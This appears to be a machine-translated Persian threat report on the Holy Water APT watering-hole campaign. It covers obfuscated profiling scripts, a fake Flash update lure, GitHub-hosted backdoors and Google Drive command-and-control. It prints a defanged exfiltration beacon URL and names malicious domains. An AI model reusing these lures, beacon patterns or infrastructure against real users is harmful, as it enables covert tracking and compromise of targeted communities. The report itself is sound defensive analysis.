APT آب مقدس
Holy Water APT نامی است که به گروهی از مجرمان سایبری داده شده است که یک سری حملات از نوع چاله آب را علیه یک گروه مذهبی و قومی آسیایی انجام دادند. TTP (تاکتیک ها، تکنیک ها و رویه ها) این حمله خاص را نمی توان به هیچ یک از بازیگران شناخته شده ATP (تهدید پایدار پیشرفته) نسبت داد، که محققان را به این نتیجه رساند که این یک گروه مجرم سایبری جدید است که ویژگی های خود را نشان می دهد. یک تیم کوچک و انعطاف پذیر از هکرها.
برای انجام یک حمله حفره آب، مجرمان چندین وب سایت را هدف قرار می دهند که به طور مکرر توسط اهداف تعیین شده بازدید می شود. سایت ها می توانند متعلق به سازمان ها، موسسات خیریه یا افراد با نفوذی باشند که به گروه هدف تعلق دارند. همه وبسایتهایی که توسط آب مقدس در معرض خطر قرار گرفته بودند، روی یک سرور میزبانی میشدند و شامل شخصیت مذهبی، خیریه، برنامه خدمات داوطلبانه، و سازمان تجارت منصفانه و غیره بودند.
حمله شامل چند مرحله بود
با بازدید از یک وب سایت در معرض خطر، کاربر وارد اولین مرحله حمله می شود که شامل یک جاوا اسکریپت خراب به نام (script|jquery)-css.js است و با Sojson، یک سرویس وب مبتنی بر چین، مبهم شده است. نقش این اسکریپت این است که تعیین کند آیا کاربر یک هدف معتبر است یا خیر و برای انجام این کار، payload شروع به خراش دادن دادهها روی بازدیدکننده و ارسال آن به یک سرور خارجی در loginwebmailnic.dynssl[.]com از طریق درخواستهای HTTP GET میکند:
https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=
پاسخ سرور یک نتیجه درست یا نادرست را برمیگرداند و اگر مقدار درست باشد، مرحله بعدی حمله آغاز میشود. در غیر این صورت هیچ اتفاقی نمی افتد
در مرحله دوم، یک جاوا اسکریپت با نام (script|jquery)-file.js که یک بار دیگر به همان شیوه مبهم می شود. با این حال، این بار هکرها به جای v4 از Sojson v5 استفاده کردند. برای آلوده کردن کاربر، Holy Water APT از هیچ آسیب پذیری یا ضعف نرم افزاری استفاده نمی کند. درعوض، یک پنجره پاپ آپ با ارائه به روز رسانی فلش پلیر ایجاد می شود و قربانی احتمالی باید با دانلود فایل موافقت کند.
Arsenal of Malware Tools Holy Water APT در GitHub میزبانی شد
اگر کاربر اجازه دهد بهروزرسانی جعلی Flash ادامه یابد، به یک مخزن GitHub که دیگر فعال نیست واقع در github.com/AdobeFlash32/FlashUpdate متصل میشود . چهار مجموعه مختلف از ابزارها در آن مکان ذخیره شدند - یک بسته نصب کننده، یک بدافزار در پشتی به نام محققین Godlike12 ، و دو نسخه از یک درپشتی منبع باز Python معروف به Stitch که توسط هکرها با قابلیت های توسعه یافته اصلاح شد. بسته بهروزرسانی یک نصبکننده NSIS است که یک نصبکننده قانونی Windows Flash Player و یک ابزار مرحلهای را که برای بارگیری بار واقعی استفاده میشود، حذف میکند. درب پشتی Godlike12 به زبان Go نوشته شده است و برای پیاده سازی یک کانال Google Drive در سرورهای Command and Control (C&C, C2) استفاده می شود. در مورد انواع درپشتی Stitch، علاوه بر فعالیتهای معمولی درب پشتی مانند جمعآوری اطلاعات و رمز عبور، ثبت فعالیتها، دانلود فایل و غیره، گروه آب مقدس، قابلیت دانلود برنامه قانونی نصب Adobe Flash را برای بهروزرسانی خودکار اضافه کرد. خود را از ubntrooters.serveuser.com دریافت می کند و با استفاده از وظایف برنامه ریزی شده به پایداری دست می یابد.